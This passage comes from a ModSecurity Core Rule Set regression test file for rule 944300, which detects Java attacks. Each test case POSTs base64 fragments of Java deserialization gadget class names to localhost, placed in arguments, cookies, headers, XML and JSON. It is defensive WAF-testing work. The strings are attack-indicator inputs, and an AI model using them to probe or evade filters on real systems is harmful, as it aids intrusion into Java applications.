"Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-151 - desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-152 - desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-153 - desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-154 - desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-155 - desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-156 - desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-157 - desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-158 - desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-159 - desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-160 - desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-161 - desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-162 - desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-163 - desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-164 - desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-165 - desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-166 - desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-167 - desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-168 - desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-169 - desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-170 - desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-171 - desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-172 - desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-173 - desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-174 - desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-175 - desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-176 - desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-177 - desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-178 - desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-179 - desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-180 - desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-181 - desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-182 - desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-183 - desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-184 - desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-185 - desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-186 - desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-187 - desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-188 - desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-189 - desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-190 - desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-191 - desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-192 - desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - 